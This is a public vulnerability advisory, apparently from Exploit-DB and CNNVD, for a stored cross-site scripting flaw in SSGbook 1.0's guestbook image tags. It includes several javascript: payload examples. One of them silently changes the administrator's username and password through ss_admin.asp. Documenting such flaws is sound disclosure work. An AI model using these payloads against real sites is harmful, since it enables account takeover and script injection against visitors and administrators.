https://www.exploit-db.com/exploits/21914
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-752

Script-ShedGuestBook1.0版本中的configure.asp存在跨站脚本(XSS)漏洞。远程攻击者可以通过(1)image，(2)img，(3)image=right，(4)img=right，(5)image=left，and(6)img=left标签中的javascript:URL注入任意web脚本或HTML。

source: http://www.securityfocus.com/bid/5915/info

SSGbook includes codes for allowing users to specify HTML formatting and layout inside of guestbook entries. For example, a user can include an image by including it inside of [image] or [img] tags. However, arbitrary HTML and script code are not sufficiently sanitized within these tags.

As a result, users may include malicious HTML and script code inside of guestbook entries. The attacker-supplied code will be rendered in the web client of a user who views a malicious guestbook entry. 

[image]javascript:{SCRIPT}[/image]

[img=right]javascript:{SCRIPT}[/img=right]

[image=right]javascript:{SCRIPT}[/image=right]

[img=left]javascript:{SCRIPT}[/img=left]

[image=left]javascript:{SCRIPT}[/image=left]

[img]javascript:{SCRIPT}[/img]

[image]javascript:document.location="ss_admin.asp?Mode=Update&Acton=Access&UserName=Pom&Password=turlututu";[/image]

来源:BID
名称:5915
链接:http://www.securityfocus.com/bid/5915
来源:XF
名称:ss-guestbook-img-xss(10331)
链接:http://www.iss.net/security_center/static/10331.php
来源:BUGTRAQ
名称:20021008SSGbook(ASP)
链接:http://online.securityfocus.com/archive/1/294299
来源:BUGTRAQ
名称:20031001Re:SSGbook(ASP)
链接:http://archives.neohapsis.com/archives/bugtraq/2003-10/0009.html